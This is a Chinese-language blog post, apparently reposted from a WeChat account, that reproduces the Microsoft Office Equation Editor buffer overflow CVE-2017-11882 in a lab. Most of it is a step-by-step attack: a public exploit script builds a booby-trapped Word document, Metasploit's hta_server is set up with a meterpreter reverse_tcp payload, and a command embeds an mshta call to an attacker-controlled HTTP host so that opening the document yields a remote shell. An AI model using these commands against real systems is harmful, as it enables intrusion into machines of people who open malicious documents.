CVE-2017-11882复现

admin 2021年12月14日13:02:52评论162 views字数 792阅读2分38秒阅读模式
CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。

威胁类型:栈溢出

影响版本:Microsoft Office 2000/2003/2007sp3/2010sp2/2013sp1/2016

EXP

下载:https://github.com/Ridter/CVE-2017-11882.git

CVE-2017-11882复现

生成word文件并启动计算器

python2 Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

CVE-2017-11882复现复制到靶机运行


CVE-2017-11882复现

EXP生成

hta 是 HTML 应用程序,大多数的 Windows 操作系统都支持 hta 文件执行,利用 mshta.exe 解析 .hta文件执行,这里的 .hta 文件可以是本地的也可以是可访问的远程主机上的

  • exploit模块:use exploit/windows/misc/hta_server

  • payload模块:set payload windows/meterpreter/reverse_tcp

  • 指定web地址:set SRVHOST kali的IP

  • 指定web端口:set SRVPORT 指定的端口

  • 指定地址:set RHOST kali的IP

  • 指定监听端口:set LPORT 监听端口

  • 运行:run -j #-j是隐藏连接的意思

CVE-2017-11882复现

执行:

python2 Command43b_CVE-2017-11882.py -c "mshta http://192.168.10.27:801/hJW2IT.hta" -o laela.doc

复制到靶机执行

CVE-2017-11882复现

拿到shell

CVE-2017-11882复现


CVE-2017-11882复现




原文始发于微信公众号(衡阳信安):CVE-2017-11882复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月14日13:02:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2017-11882复现http://cn-sec.com/archives/677038.html

发表评论

匿名网友 填写信息